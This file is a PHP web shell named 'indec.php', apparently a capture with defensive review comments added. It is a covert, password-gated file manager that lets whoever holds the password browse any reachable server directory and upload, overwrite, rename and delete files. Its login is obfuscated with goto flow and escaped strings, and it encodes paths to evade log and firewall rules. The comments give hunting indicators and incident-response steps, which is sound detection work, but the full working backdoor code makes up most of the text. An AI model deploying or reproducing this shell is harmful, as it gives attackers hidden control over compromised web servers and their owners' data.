View file File name : indec.php Content :<?php
// ANALYSIS NOTES (defensive review; the code itself is reproduced unchanged).
//
// What this file is: a password-gated, browser-driven file manager. After the
// gate it lists directories and lets the caller upload, edit, rename and
// delete files with the privileges of the PHP process. Nothing below confines
// those operations to the directory the script lives in. Treat its presence
// on a server as evidence of compromise, not as an admin tool.
// NOTE(review): the name `indec.php` is one letter away from `index.php`,
// presumably so it blends into a directory listing.
//
// Obfuscation used in the gate: control flow is flattened with `goto` and
// random-looking labels, and every sensitive string ($_SESSION / $_POST keys,
// the stored hash, the login HTML) is written as mixed hex/octal escapes, so
// a plain-text search for "password" or "<form" will not match this section.
//
// Content indicators for hunting (all derived from the literals below):
//   - stored credential string: 0a91ec78a2cb8e808895b5a60ade6c1d
//   - session key: loggedokm
//   - `goto` labels next to escape-encoded superglobal keys
goto NLnKLsvYFH;
NLnKLsvYFH:
// Decodes to the 32-hex-character string 0a91ec78a2cb8e808895b5a60ade6c1d.
// It is compared with md5() of the submitted password below, i.e. it is an
// unsalted MD5 digest of the operator's password.
$password = "\x30\x61\x39\x31\x65\x63\x37\x38\x61\x32\x63\x62\x38\x65\x38\x30\x38\x38\x39\x35\x62\x35\x61\x36\x30\x61\x64\x65\x36\x63\x31\x64";
// Errors are silenced and the execution time limit is removed, so failures
// produce no PHP warnings in the response and no script timeout applies.
error_reporting(0);
set_time_limit(0);
session_start();
// The escaped key decodes to "loggedokm" (the author's own inline note agrees).
if (isset($_SESSION["\x6c\x6f\x67\x67\145\144\157\x6b\x6d"])) { #loggedokm
    goto DqqOhzX5B0;
}
goto u3NT7x2QrJ;
u3NT7x2QrJ:
// First visit in this session: mark the session as not authenticated.
$_SESSION["\x6c\x6f\147\x67\x65\144\157\153\x6d"] = false;
DqqOhzX5B0:
// The escaped key decodes to "password" (POST field from the login form).
if (!isset($_POST["\160\x61\x73\163\x77\x6f\x72\x64"])) { #password
    goto pb73Ufbn0o;
}
// Loose `==` comparison of md5(submitted password) against the stored string.
if (!(md5($_POST["\160\x61\x73\163\x77\157\x72\144"]) == $password)) {
    goto mr5E2rLws5;
}
// On a match the digest itself is stored in the session as the "logged in" marker.
$_SESSION["\x6c\x6f\x67\x67\145\x64\x6f\153\155"] = md5(
    $_POST["\160\141\x73\163\x77\x6f\x72\x64"]
);
goto SjaSVtI46I;
SjaSVtI46I:
mr5E2rLws5:
pb73Ufbn0o:
// Authenticated sessions (marker set and equal to the stored digest) jump past
// the login page; everything else falls through to the echo + exit() below.
if (
    !(
        !$_SESSION["\154\157\x67\x67\145\x64\157\x6b\155"] ||
        $_SESSION["\x6c\x6f\x67\147\x65\x64\x6f\x6b\155"] != $password
    )
) {
    goto EXNN3Tp2rS;
}
// The escaped literal decodes to a bare HTML page (blank title) holding one
// POST form with a password input named "password" and a submit button.
// Unauthenticated requests therefore see only that form, and no listing.
// NOTE(review): in this capture the literal is wrapped in the middle of an
// escape (`\x2` / `0`); the intact escape is presumably `\x20`. The literal is
// reproduced exactly as captured.
echo "\xd\xa\74\x68\164\x6d\154\76\74\150\145\x61\x64\76\74\x74\x69\164\154\145\x3e\40\74\x2f\164\x69\x74\x6c\x65\76\x3c\57\150\145\x61\144\x3e\xd\12\40\40\x3c\x62\x6f\144\x79\76\xd\xa\x20\x20\x20\x20\x3c\x70\40\x61\x6c\x69\x67\156\x3d\x22\143\x65\x6e\x74\x65\x72\42\x3e\74\143\145\x6e\164\145\162\x3e\74\x66\157\x6e\164\40\163\x74\171\x6c\145\x3d\x22\x66\x6f\156\164\x2d\x73\151\x7a\x65\72\x31\63\x70\170\x22\40\143\157\154\x6f\162\75\x22\43\x66\x64\145\x36\x63\144\42\x20\x66\x61\143\145\75\x22\x22\x3e\15\12\x20\40\40\x20\74\146\x6f\x72\x6d\x20\155\x65\x74\x68\x6f\x64\75\x22\x70\x6f\x73\x74\42\76\15\xa\40\40\x20\x20\x20\x20\74\151\x6e\x70\x75\x74\x20\164\x79\x70\x65\x3d\42\x70\x61\x73\x73\167\157\x72\144\42\x20\156\x61\155\x65\75\42\x70\x61\x73\x73\x77\x6f\162\144\42\76\xd\12\40\x20\40\x20\x20\x20\x3c\151\156\160\165\164\x20\x74\171\x70\145\x3d\42\163\x75\142\x6d\x69\x74\x22\40\156\141\155\145\75\42\163\165\x62\x6d\x69\164\42\40\x76\141\x6c\165\145\x3d\x22\x20\x20\x3e\76\x22\x3e\15\xa\x20\x20\40\40\74\57\x66\x6f\162\155\76\15\12\x20\x2
0\74\57\x62\x6f\x64\171\76\xd\12\74\x2f\x68\164\x6d\x6c\x3e\15\xa\15\xa";
exit();
goto ocC9gxzse4;
ocC9gxzse4:
EXNN3Tp2rS:
// Everything from here on runs only for an authenticated session. The page
// shell pulls Bootstrap and Font Awesome from public CDNs; those requests are
// made by the operator's browser, not by the server.
?> <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>000</title> <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0-alpha1/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-GLhlTQ8iRABdZLl6O3oVMWSktQOp6b7In1Zl3/Jr59b6EGGoI1aFkw7cmDA6j6gD" crossorigin="anonymous"> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.3.0/css/all.min.css" integrity="sha512-SzlrxWUlpfuzQ+pcUCosxcglQRNAq/DZjVsC0lE40xsADsfeQoEypE+enwcOiGjk/bSuGGKHEyjSoQ1zVisanQ==" crossorigin="anonymous" referrerpolicy="no-referrer" /></head><body> <?php
/**
 * Render a byte count as a human-readable string (GB / MB / KB with two
 * decimals, otherwise "N bytes", "1 byte" or "0 bytes").
 */
function formatSizeUnits($bytes)
{
    if ($bytes >= 1073741824) {
        $bytes = number_format($bytes / 1073741824, 2) . " GB";
    } elseif ($bytes >= 1048576) {
        $bytes = number_format($bytes / 1048576, 2) . " MB";
    } elseif ($bytes >= 1024) {
        $bytes = number_format($bytes / 1024, 2) . " KB";
    } elseif ($bytes > 1) {
        $bytes = $bytes . " bytes";
    } elseif ($bytes == 1) {
        $bytes = $bytes .
            " byte";
    } else {
        $bytes = "0 bytes";
    }
    return $bytes;
}
/**
 * Return the text after the last "." in $file (no dot is included).
 */
function fileExtension($file)
{
    return substr(strrchr($file, "."), 1);
}
/**
 * Pick a Font Awesome <i> tag for a file name: two special-cased names
 * ("error_log", ".htaccess") first, then a lookup on the lower-cased extension.
 */
function fileIcon($file)
{
    $imgs = [
        "apng",
        "avif",
        "gif",
        "jpg",
        "jpeg",
        "jfif",
        "pjpeg",
        "pjp",
        "png",
        "svg",
        "webp",
    ];
    $audio = ["wav", "m4a", "m4b", "mp3", "ogg", "webm", "mpc"];
    $ext = strtolower(fileExtension($file));
    if ($file == "error_log") {
        return '<i class="fa-sharp fa-solid fa-bug"></i> ';
    } elseif ($file == ".htaccess") {
        return '<i class="fa-solid fa-hammer"></i> ';
    }
    if ($ext == "html" || $ext == "htm") {
        return '<i class="fa-brands fa-html5"></i> ';
    } elseif ($ext == "php" || $ext == "phtml") {
        return '<i class="fa-brands fa-php"></i> ';
    } elseif (in_array($ext, $imgs)) {
        return '<i class="fa-regular fa-images"></i> ';
    } elseif ($ext == "css") {
        return '<i class="fa-brands fa-css3"></i> ';
    } elseif ($ext == "txt") {
        return '<i class="fa-regular fa-file-lines"></i> ';
    } elseif (in_array($ext, $audio)) {
        return '<i class="fa-duotone fa-file-music"></i> ';
    } elseif ($ext == "py") {
        return '<i class="fa-brands fa-python"></i> ';
    } elseif ($ext == "js") {
        return '<i class="fa-brands fa-js"></i> ';
    } else {
        return '<i class="fa-solid fa-file"></i> ';
    }
}
/**
 * Replace "/", "\", "." and ":" in a path with four Bengali letters.
 *
 * Detection note: because of this substitution, paths carried in the `p` and
 * `q` query parameters contain no slashes, dots or drive colons, so log or
 * WAF rules keyed on "../" or absolute paths will not match these requests.
 * URL-encoded, the four letters appear as %E0%A6%95 through %E0%A6%98; that
 * byte pattern in `p=` / `q=` values is a practical access-log indicator.
 */
function encodePath($path)
{
    $a = ["/", "\\", ".", ":"];
    $b = ["ক", "খ", "গ", "ঘ"];
    return str_replace($a, $b, $path);
}
/**
 * Inverse of encodePath(): map the four Bengali letters back to "/", "\",
 * "." and ":".
 */
function decodePath($path)
{
    $a = ["/", "\\", ".", ":"];
    $b = ["ক", "খ", "গ", "ঘ"];
    return str_replace($b, $a, $path);
}
// Working-directory selection. `p` (browse) or `q` (action context) is decoded
// and accepted if is_dir() succeeds; that is the only check. $root_path is
// used solely as the default, so any directory the PHP process can reach is
// accepted. In the "not a directory" branches $p is never assigned, yet
// define("PATH", $p) below still executes.
$root_path = __DIR__;
if (isset($_GET["p"])) {
    if (empty($_GET["p"])) {
        $p = $root_path;
    } elseif (!is_dir(decodePath($_GET["p"]))) {
        echo "<script>\nalert('Directory is Corrupted and Unreadable.');\nwindow.location.replace('?');\n</script>";
    } elseif (is_dir(decodePath($_GET["p"]))) {
        $p = decodePath($_GET["p"]);
    }
} elseif (isset($_GET["q"])) {
    if (!is_dir(decodePath($_GET["q"]))) {
        echo "<script>window.location.replace('?p=');</script>";
    } elseif (is_dir(decodePath($_GET["q"]))) {
        $p = decodePath($_GET["q"]);
    }
} else {
    $p =
        $root_path;
}
define("PATH", $p);
// Navigation bar: a breadcrumb where each path component links to its
// cumulative path, followed by "Upload File" and "HOME" buttons.
echo '<nav class="navbar navbar-light" style="background-color: #fdcdf9;"> <div class="navbar-brand"> <a href="?"><img src="https://github.com/fluidicon.png" width="30" height="30" alt=""></a>';
$path = str_replace("\\", "/", PATH);
$paths = explode("/", $path);
foreach ($paths as $id => $dir_part) {
    if ($dir_part == "" && $id == 0) {
        // Leading empty component means an absolute POSIX path; $a is assigned
        // here but not read anywhere in this file.
        $a = true;
        echo "<a href=\"?p=/\">/</a>";
        continue;
    }
    if ($dir_part == "") {
        continue;
    }
    echo "<a href='?p=";
    for ($i = 0; $i <= $id; $i++) {
        echo str_replace(":", "ঘ", $paths[$i]);
        if ($i != $id) {
            echo "ক";
        }
    }
    // Directory names are written into the page without HTML escaping.
    echo "'>" . $dir_part . "</a>/";
}
echo '</div><div class="form-inline"><a href="?upload&q=' .
    urlencode(encodePath(PATH)) .
    '"><button class="btn btn-dark" type="button">Upload File</button></a><a href="?"><button type="button" class="btn btn-dark">HOME</button></a> </div></nav>';
// Directory listing, shown only when `p` is present. Each row exposes name,
// size, mtime and the low three octal permission digits, plus action links
// that carry the target name in `r` (rename), `e` (edit) or `d` (delete).
if (isset($_GET["p"])) {
    if (is_readable(PATH)) {
        $fetch_obj = scandir(PATH);
        $folders = [];
        $files = [];
        foreach ($fetch_obj as $obj) {
            if ($obj == "." || $obj == "..") {
                continue;
            }
            $new_obj = PATH . "/" . $obj;
            if (is_dir($new_obj)) {
                array_push($folders, $obj);
            } elseif (is_file($new_obj)) {
                array_push($files, $obj);
            }
        }
    }
    // $folders / $files are only initialised inside the is_readable() branch;
    // with error_reporting(0) an unreadable directory yields an empty table
    // rather than a visible warning.
    echo '<table class="table table-hover"> <thead> <tr> <th scope="col">Name</th> <th scope="col">Size</th> <th scope="col">Modified</th> <th scope="col">Perms</th> <th scope="col">Actions</th> </tr> </thead> <tbody>';
    foreach ($folders as $folder) {
        echo " <tr> <td><i class='fa-solid fa-folder'></i> <a href='?p=" .
            urlencode(encodePath(PATH . "/" . $folder)) .
            "'>" .
            $folder .
            "</a></td> <td><b>---</b></td> <td>" .
            date("F d Y H:i:s.", filemtime(PATH . "/" . $folder)) .
            "</td> <td>0" .
            substr(decoct(fileperms(PATH . "/" . $folder)), -3) .
            "</a></td> <td> <a title='Rename' href='?q=" .
            urlencode(encodePath(PATH)) .
            "&r=" .
            $folder .
            "'><i class='fa-sharp fa-regular fa-pen-to-square'></i></a> <a title='Delete' href='?q=" .
            urlencode(encodePath(PATH)) .
            "&d=" .
            $folder .
            "'><i class='fa fa-trash' aria-hidden='true'></i></a> <td> </tr>";
    }
    foreach ($files as $file) {
        echo " <tr> <td>" .
            fileIcon($file) .
            $file .
            "</td> <td>" .
            formatSizeUnits(filesize(PATH . "/" . $file)) .
            "</td> <td>" .
            date("F d Y H:i:s.", filemtime(PATH . "/" . $file)) .
            "</td> <td>0" .
            substr(decoct(fileperms(PATH . "/" . $file)), -3) .
            "</a></td> <td> <a title='Edit File' href='?q=" .
            urlencode(encodePath(PATH)) .
            "&e=" .
            $file .
            "'><i class='fa-solid fa-file-pen'></i></a> <a title='Rename' href='?q=" .
            urlencode(encodePath(PATH)) .
            "&r=" .
            $file .
            "'><i class='fa-sharp fa-regular fa-pen-to-square'></i></a> <a title='Delete' href='?q=" .
            urlencode(encodePath(PATH)) .
            "&d=" .
            $file .
            "'><i class='fa fa-trash' aria-hidden='true'></i></a> <td> </tr>";
    }
    echo " </tbody></table>";
} else {
    if (empty($_GET)) {
        // A request with no query string is bounced to "?p=" (the default listing).
        echo "<script>window.location.replace('?p=');</script>";
    }
}
// Upload form, rendered when the `upload` query key is present.
if (isset($_GET["upload"])) {
    echo ' <form method="post" enctype="multipart/form-data"> Select file to upload: <input type="file" name="fileToUpload" id="fileToUpload"> <input type="submit" class="btn btn-dark" value="Upload" name="upload"> </form>';
}
// Rename. The current name comes from `r` and the new one from POST `name`;
// both are concatenated onto PATH as-is, and `r` is also echoed into the form
// without escaping. Response for incident handling: compare file names in the
// affected directories against a known-good baseline.
if (isset($_GET["r"])) {
    if (!empty($_GET["r"]) && isset($_GET["q"])) {
        echo ' <form method="post"> Rename: <input type="text" name="name" value="' .
            $_GET["r"] .
            '"> <input type="submit" class="btn btn-dark" value="Rename" name="rename"> </form>';
        if (isset($_POST["rename"])) {
            $name = PATH . "/" . $_GET["r"];
            if (rename($name, PATH . "/" . $_POST["name"])) {
                echo "<script>alert('Renamed.'); window.location.replace('?p=" .
                    encodePath(PATH) .
                    "');</script>";
            } else {
                echo "<script>alert('Some error occurred.'); window.location.replace('?p=" .
                    encodePath(PATH) .
                    "');</script>";
            }
        }
    }
}
// Edit. The file named by `e` is read into a textarea; on POST `edit` the
// submitted `data` overwrites it (fopen mode "w"). Any file the PHP process
// can write, including application source, may have been altered through
// this path, so integrity-check code and config after finding this script.
if (isset($_GET["e"])) {
    if (!empty($_GET["e"]) && isset($_GET["q"])) {
        echo ' <form method="post"> <textarea style="height: 500px; width: 90%;" name="data">' .
            htmlspecialchars(file_get_contents(PATH . "/" . $_GET["e"])) .
            '</textarea> <br> <input type="submit" class="btn btn-dark" value="Save" name="edit"> </form>';
        if (isset($_POST["edit"])) {
            $filename = PATH . "/" . $_GET["e"];
            $data = $_POST["data"];
            $open = fopen($filename, "w");
            if (fwrite($open, $data)) {
                echo "<script>alert('Saved.'); window.location.replace('?p=" .
                    encodePath(PATH) .
                    "');</script>";
            } else {
                echo "<script>alert('Some error occurred.'); window.location.replace('?p=" .
                    encodePath(PATH) .
                    "');</script>";
            }
            fclose($open);
        }
    }
}
// Upload handler. The destination is PATH plus the client-supplied file name;
// no extension, type or size check appears here. Look for recently created
// files owned by the web-server account in every directory named in `q`.
if (isset($_POST["upload"])) {
    $target_file = PATH . "/" . $_FILES["fileToUpload"]["name"];
    if (
        move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $target_file)
    ) {
        echo "<p>" .
            htmlspecialchars(basename($_FILES["fileToUpload"]["name"])) .
            " has been uploaded.</p>";
    } else {
        echo "<p>Sorry, there was an error uploading your file.</p>";
    }
}
// Delete. Triggered by a plain GET carrying `d` and `q`: unlink() for files,
// rmdir() for directories. Because it is a GET, each deletion leaves a
// request line in the web access log with the target name in `d`.
if (isset($_GET["d"]) && isset($_GET["q"])) {
    $name = PATH . "/" . $_GET["d"];
    if (is_file($name)) {
        if (unlink($name)) {
            echo "<script>alert('File removed.'); window.location.replace('?p=" .
                encodePath(PATH) .
                "');</script>";
        } else {
            echo "<script>alert('Some error occurred.'); window.location.replace('?p=" .
                encodePath(PATH) .
                "');</script>";
        }
    } elseif (is_dir($name)) {
        if (rmdir($name) == true) {
            echo "<script>alert('Directory removed.'); window.location.replace('?p=" .
                encodePath(PATH) .
                "');</script>";
        } else {
            echo "<script>alert('Some error occurred.'); window.location.replace('?p=" .
                encodePath(PATH) .
                "');</script>";
        }
    }
}
?> <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0-alpha1/dist/js/bootstrap.bundle.min.js" integrity="sha384-w76AqPfDkMBDXo30jS1Sgez6pr3x5MlQ1ZAGC+nuZB+EYdgRZgiwxhTBTkF7CXvN" crossorigin="anonymous"></script></body></html>